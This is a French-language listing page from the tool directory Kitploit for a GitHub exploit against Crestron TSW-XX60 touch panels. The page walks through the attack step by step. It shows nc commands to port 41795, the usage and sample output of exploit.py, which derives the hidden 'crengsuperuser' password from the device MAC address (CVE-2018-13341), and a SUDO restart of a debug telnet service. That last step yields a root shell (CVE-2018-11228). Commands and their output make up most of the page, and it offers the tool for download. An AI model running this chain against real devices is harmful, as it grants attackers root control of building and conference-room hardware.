Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-13341 — Cet outil vise à exploiter la CVE-2018-13341 | Kitploit
Outils/GitHubGitHub/rajchowdhury240/cve-2018-13341
Sécurité des Systèmes EmbarquésAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité Matériel et IoT
GitHubrajchowdhury240/cve-2018-13341

CVE-2018-13341

Cet outil vise à exploiter la CVE-2018-13341

Voir le dépôt
il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-13341

Cet outil vise à exploiter la CVE-2018-13341. En utilisant l'adresse MAC de l'appareil ciblé, vous pouvez récupérer le mot de passe du compte caché "crengsuperuser" qui possède des privilèges élevés et vous permet d'exécuter des commandes SUDO.

Le protocole Crestron Toolbox (CTP) peut être utilisé en accédant au port 41795 sur l'appareil TSW-XX60.

root@kitploit:~
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

Requirements

Cet outil nécessite le module CryptoGraphy.

root@kitploit:~
# pip3 install cryptography

OU

root@kitploit:~
# pip3 install -r requirements.txt

Getting Started

root@kitploit:~
usage: exploit.py [-h] [-m MAC]


# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass

Exploiting the CVE-2018-11228

La CVE-2018-11228 permet une RCE non authentifiée via le service Bash Shell dans le protocole Crestron Terminal (CTP). Après avoir obtenu le mot de passe du compte caché "crengsuperuser", vous pouvez obtenir un accès root sur la machine.

root@kitploit:~
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

Ensuite, dans un nouveau shell, vous pouvez obtenir un accès root sur la machine.

root@kitploit:~
# telnet w.x.y.z

bash# whoami
root
root@kitploit:~
Credit Goes to : axcheron 
Télécharger l’outil